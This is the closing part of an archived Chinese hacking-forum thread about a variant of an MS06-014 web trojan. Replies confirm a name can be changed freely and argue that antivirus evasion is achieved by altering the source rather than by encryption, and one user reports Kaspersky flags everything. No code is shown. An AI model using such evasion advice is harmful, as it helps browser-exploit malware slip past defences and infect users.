[quote][b]这里是引用第[/b][color=#ff0000][42 楼][/color][b]的[color=#000066]zxyand[/color]于[/b]2006-10-07 20:25[b]发表的：[/b]
那是不是可以随便改为其他的名字呢？[/quote]

可以。你随便改

osur 2007-7-28 20:53

不加密免杀才是正道

我们所做的加密只是对源代码的一种保护

个人看法吧，如果说源代码不免杀，你怎么加密到头都一样不免杀，还是要从源码下手操作免杀

feras 2007-8-20 12:11

all detected from kaspersky as exploit :(

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

[原创]MS06014网马的一种变形方法